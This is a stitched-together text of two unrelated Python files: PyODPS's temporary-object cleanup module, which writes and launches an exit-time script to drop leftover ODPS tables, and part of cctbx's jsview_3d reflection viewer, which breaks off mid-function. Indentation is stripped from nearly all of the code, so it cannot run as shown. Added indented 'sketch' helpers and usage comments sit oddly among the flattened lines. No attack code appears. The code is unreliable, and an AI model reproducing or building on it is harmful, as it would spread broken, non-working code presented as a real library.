# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
from .accounts import AliyunAccount
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
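# Template of a standalone cleanup script. ObjectRepositoryLib formats this template, writes it
# to a temp file and launches it in a child interpreter (see _exec_cleanup_script below) so that
# temporary ODPS objects recorded by this process are dropped even after the host process exits.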
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
try:
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
except OSError:
return
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
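# Illustrative sketch (not part of the original module): ObjectRepository persists the set of
# temporary objects to a pickle file so that a later process can pick them up and drop them.
def _object_repository_example():  # hypothetical helper, shown for illustration only
    import os
    import tempfile
    path = os.path.join(tempfile.gettempdir(), 'temp_objs_example.his')
    repo = ObjectRepository(path)
    repo.put(TempTable('tmp_table_1', 'example_project'))  # recorded in memory and dumped to disk
    reloaded = ObjectRepository(path)                      # a fresh instance reloads the record
    assert TempTable('tmp_table_1', 'example_project') in reloaded._container
    os.unlink(path)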
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# we do not clean running process, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
if hasattr(odps.account, 'access_id'):
keys = [odps.account.access_id, odps.endpoint, odps.project]
elif hasattr(odps.account, 'token'):
keys = [odps.account.token, odps.endpoint, odps.project]
return hashlib.md5('####'.join(keys).encode('utf-8')).hexdigest()
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
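# Usage sketch (illustrative; names are hypothetical): code that creates temporary ODPS objects
# registers them so the cleanup script can drop them when the process exits, e.g.
#     register_temp_table(o, 'tmp_result_table')            # `o` is an ODPS entrance object
#     register_temp_function(o, 'tmp_udf', project='proj')
#     clean_stored_objects(o)  # drop leftovers recorded by earlier, no longer running processes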
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
|
jsview_3d.py
|
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
from websocket_server import WebsocketServer
import threading, math, sys, cmath
from time import sleep
import os.path, time, copy
import libtbx
from libtbx import easy_mp
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, path):
return [ e.path for e in philobj.all_definitions() if path in e.path ]
class ArrayInfo:
def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
from iotbx.gui_tools.reflections import get_array_description
data = millarr.data()
if isinstance(data, flex.int):
data = [e for e in data if e != display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
data = [e for e in data if not math.isnan(e)]
self.maxdata = max(data)
self.mindata = min(data)
self.maxsigmas = self.minsigmas = None
if millarr.sigmas() is not None:
data = millarr.sigmas()
data = [e for e in data if not math.isnan(e)]
self.maxsigmas = max(data)
self.minsigmas = min(data)
self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
self.labels = self.desc = ""
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if millarr.info():
self.labels = millarr.info().label_string()
if fomlabel:
self.labels = millarr.info().label_string() + " + " + fomlabel
self.desc = get_array_description(millarr)
self.span = ("?" , "?")
self.spginf = millarr.space_group_info().symbol_and_number()
dmin = 0.0
dmax = 0.0
try:
self.span = ( millarr.index_span().min(), millarr.index_span().max())
dmin = millarr.d_max_min()[1]
dmax = millarr.d_max_min()[0]
except Exception as e:
mprint(to_str(e))
issymunique = millarr.is_unique_set_under_symmetry()
isanomalous = millarr.anomalous_flag()
self.infotpl = ( self.labels, self.desc, self.spginf, millarr.indices().size(), self.span,
self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique, isanomalous )
self.infostr = "%s (%s), space group: %s, %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d, Anomalous: %d" %self.infotpl
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, None)]
#mprint("in MakeHKLscene", verbose=True)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
#settings = copy.deepcopy(settings)
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded")
if settings.inbrowser:
settings.expand_anomalous = False
settings.expand_to_p1 = False
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True )
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
#return False
continue
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
b = flex.bool([bool(math.isnan(e[0]) + math.isnan(e[1]) + math.isnan(e[2])) for e in hklscene.colors])
hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
b = flex.bool([bool(math.isnan(e)) for e in hklscene.radii])
hklscene.radii = hklscene.radii.set_selected(b, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
scenemaxdata.append( ainf.maxdata )
scenemindata.append( ainf.mindata )
scenemaxsigmas.append(ainf.maxsigmas)
sceneminsigmas.append(ainf.minsigmas)
scenearrayinfos.append((ainf.infostr, pidx, fidx, ainf.labels))
#self.mprint("%d, %s" %(i, infostr) )
#i +=1
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
tooltipstringsdict = {}
colstraliases = ""
if hklscene.isUsingFOMs():
return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
colstraliases += "\n var st%d = '\\n%s: ';" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
hkl = hklscene.indices[i]
if hkl not in tooltipstringsdict:
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
# st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
return tooltipstringsdict, colstraliases
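# For illustration: each entry of the tooltipstringsdict returned above maps a Miller index to a
# JavaScript string fragment, roughly of the form (hedged reconstruction from the code above)
#     (1, 2, 3) -> "'+hk+'1, 2, 3\ndres: 2.5 '+AA+''+st0+'12.3, 45.0'+DGR+'"
# where hk, AA, DGR and st0 are aliases declared in colstraliases and in the main NGL script.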
class hklview_3d:
def __init__(self, *args, **kwds):
self.settings = kwds.get("settings")
self.ngl_settings = None #NGLsettings()
self.viewerparams = None
self.params = None
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.merge = False
self.NGLscriptstr = ""
self.camera_type = "orthographic"
self.primitivetype = "SphereBuffer"
self.script_has_tooltips = False
self.url = ""
self.binscenelabel = "Resolution"
self.colour_scene_id = None
self.radii_scene_id = None
#self.scene_id = None
self.rotation_mx = matrix.identity(3)
self.rot_recip_zvec = None
self.rot_zvec = None
self.meanradius = -1
self.past = time.time()
self.orientmessage = None
self.high_quality = True
if 'high_quality' in kwds:
self.high_quality = kwds['high_quality']
self.cameradist = 0.0
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.boundingX = None
self.boundingY = None
self.boundingZ = None
self.OrigClipNear = None
self.OrigClipFar = None
self.cameratranslation = ( 0,0,0 )
#self.angle_x_svec = 0.0
#self.angle_y_svec = 0.0
self.angle_z_svec = 0.0
#self.angle_z_yzvec = 0.0
#self.angle_y_yzvec = 0.0
#self.angle_y_xyvec = 0.0
self.angle_x_xyvec = 0.0
self.vecrotmx = None
self.unit_h_axis = None
self.unit_k_axis = None
self.unit_l_axis = None
self.normal_hk = None
self.normal_kl = None
self.normal_lh = None
self.isnewfile = False
self.has_new_miller_array = False
self.sleeptime = 0.025
self.colstraliases = ""
self.binvals = []
self.binvalsboundaries = []
self.proc_arrays = []
self.HKLscenes = []
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.bindata = None
self.sceneisdirty = True
self.hkl_scenes_info = []
self.match_valarrays = []
self.array_infostrs = []
self.array_infotpls = []
self.binstrs = []
self.bin_infotpls = []
self.mapcoef_fom_dict = {}
self.verbose = 0
if 'verbose' in kwds:
self.verbose = kwds['verbose']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbinvalsboundaries = 0
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds and kwds['htmlfname']:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds and kwds['jscriptfname'] != "":
self.jscriptfname = kwds['jscriptfname']
self.websockport = 7894
if 'websockport' in kwds:
self.websockport = kwds['websockport']
self.guisocket = None
if 'guisocket' in kwds:
self.guisocket = kwds['guisocket']
self.mprint('Output will be written to \"%s\"\n' \
'including reference to NGL JavaScript \"%s\"' %(self.hklfname, self.jscriptfname))
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.isinjected = False
self.UseOSBrowser = True
if 'UseOSBrowser' in kwds:
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrx = None
self.HKLscenesKey = ( 0, False,
self.settings.expand_anomalous, self.settings.expand_to_p1 )
self.msgqueue = []
self.websockclient = None
self.handshakewait = 5
if 'handshakewait' in kwds:
self.handshakewait = kwds['handshakewait']
self.lastmsg = "" # "Ready"
self.browserisopen = False
self.msgdelim = ":\n"
self.msgqueuethrd = None
self.StartWebsocket()
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def SendInfoToGUI(self, mydict):
if self.guisocket:
self.guisocket.send( str(mydict).encode("utf-8") )
def update_settings(self, diff_phil, curphilparam) :
self.ngl_settings = curphilparam.viewer.NGL
self.viewerparams = curphilparam.viewer
self.params = curphilparam
if has_phil_path(diff_phil, "filename") \
or has_phil_path(diff_phil, "spacegroup_choice") \
or has_phil_path(diff_phil, "merge_data") \
or has_phil_path(diff_phil, "miller_array_operation") \
or has_phil_path(diff_phil, "scene_id") \
or has_phil_path(diff_phil, "camera_type") \
or has_phil_path(diff_phil, "spacegroup_choice") \
or has_phil_path(diff_phil, "using_space_subgroup") \
or has_phil_path(diff_phil, "viewer") \
and ( \
has_phil_path(diff_phil, "show_data_over_sigma") \
or has_phil_path(diff_phil, "show_missing") \
or has_phil_path(diff_phil, "show_only_missing") \
or has_phil_path(diff_phil, "show_systematic_absences") \
or has_phil_path(diff_phil, "slice_axis") \
or has_phil_path(diff_phil, "slice_mode") \
or has_phil_path(diff_phil, "slice_index") \
or has_phil_path(diff_phil, "scale") \
or has_phil_path(diff_phil, "nth_power_scale_radii") \
or self.settings.inbrowser==False and \
( has_phil_path(diff_phil, "expand_anomalous") or \
has_phil_path(diff_phil, "expand_to_p1") )\
or has_phil_path(diff_phil, "show_anomalous_pairs") \
):
if curphilparam.viewer.slice_mode and self.settings.inbrowser:
self.settings.inbrowser = False
self.sceneisdirty = True
self.ConstructReciprocalSpace(curphilparam, merge=self.merge)
msg = ""
if has_phil_path(diff_phil, "show_missing") \
or has_phil_path(diff_phil, "show_only_missing") \
or has_phil_path(diff_phil, "show_systematic_absences") \
or has_phil_path(diff_phil, "scene_bin_thresholds") \
or has_phil_path(diff_phil, "bin_scene_label") \
or has_phil_path(diff_phil, "nbins"):
self.binvals = self.calc_bin_thresholds(curphilparam.bin_scene_label, curphilparam.nbins)
self.sceneisdirty = True
if has_phil_path(diff_phil, "camera_type"):
self.set_camera_type()
if self.viewerparams.scene_id >=0:
if not self.isinjected:
self.scene = self.HKLscenes[self.viewerparams.scene_id]
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
if has_phil_path(diff_phil, "fixorientation"):
self.fix_orientation(curphilparam.viewer.NGL.fixorientation)
if has_phil_path(diff_phil, "mouse_sensitivity"):
self.SetTrackBallRotateSpeed(curphilparam.viewer.NGL.mouse_sensitivity)
if curphilparam.viewer.slice_mode: # explicit slicing
if curphilparam.viewer.slice_axis=="h": hkl = [1,0,0]
if curphilparam.viewer.slice_axis=="k": hkl = [0,1,0]
if curphilparam.viewer.slice_axis=="l": hkl = [0,0,1]
self.clip_plane_hkl_vector(hkl[0], hkl[1], hkl[2], clipwidth=200,
fixorientation = curphilparam.viewer.NGL.fixorientation)
if self.settings.inbrowser and not curphilparam.viewer.slice_mode:
msg += self.ExpandInBrowser(P1= self.settings.expand_to_p1,
friedel_mate= self.settings.expand_anomalous)
if curphilparam.clip_plane.clipwidth and not \
( has_phil_path(diff_phil, "angle_around_vector") \
or has_phil_path(diff_phil, "bequiet") ):
if curphilparam.clip_plane.is_real_space_frac_vec:
self.clip_plane_abc_vector(curphilparam.clip_plane.h, curphilparam.clip_plane.k,
curphilparam.clip_plane.l, curphilparam.clip_plane.hkldist,
curphilparam.clip_plane.clipwidth, curphilparam.viewer.NGL.fixorientation,
curphilparam.clip_plane.is_parallel)
else:
self.clip_plane_hkl_vector(curphilparam.clip_plane.h, curphilparam.clip_plane.k,
curphilparam.clip_plane.l, curphilparam.clip_plane.hkldist,
curphilparam.clip_plane.clipwidth, curphilparam.viewer.NGL.fixorientation,
curphilparam.clip_plane.is_parallel)
msg += self.SetOpacities(curphilparam.viewer.NGL.bin_opacities )
if has_phil_path(diff_phil, "tooltip_alpha"):
self.set_tooltip_opacity()
return msg, curphilparam
def set_miller_array(self, scene_id=None, merge=None, details=""):
if scene_id is not None:
self.viewerparams.scene_id = scene_id
self.isinjected = False
if self.viewerparams and self.viewerparams.scene_id >= 0 and self.HKLscenes:
self.miller_array = self.HKLscenes[self.viewerparams.scene_id].miller_array
self.scene = self.HKLscenes[self.viewerparams.scene_id]
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
self.sg = self.miller_array.space_group()
self.symops = self.sg.all_ops()
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc), verbose=0 )
def MakeToolTips(self, HKLscenes):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
allcolstraliases = "var hk = \'H,K,L: \';\n"
alltooltipstringsdict = {}
if self.script_has_tooltips:
# large data sets would make the JavaScript file very large, with a risk of crashing the browser
self.mprint( "making tooltips")
tooltipstringsdict = {}
for j,hklscene in enumerate(HKLscenes):
#tooltipstringsdict, colstraliases = MakeTtips(hklscene, j)
#"""
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
colstraliases = "\n var st%d = '\\n%s: ';" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
hkl = hklscene.indices[i]
if hkl not in tooltipstringsdict:
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
# st1, st2,... are javascript aliases for miller array labelstrings as declared in self.colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
#"""
alltooltipstringsdict.update( tooltipstringsdict )
allcolstraliases += colstraliases
allcolstraliases += "\n"
return alltooltipstringsdict, allcolstraliases
def GetTooltipOnTheFly(self, id, rotmx=None, anomalous=False):
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
Rhkl = hklvec[0]
if rotmx:
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if anomalous:
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
# resolution and angstrom character
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
for hklscene in self.HKLscenes:
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
datval = None
if hkl in hklscene.work_array.indices():
datval = hklscene.work_array.data_at_first_index(hkl)
else:
if id >= hklscene.data.size():
continue
datval = hklscene.data[id]
if datval and (not (math.isnan( abs(datval) ) or datval == display.inanval)):
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
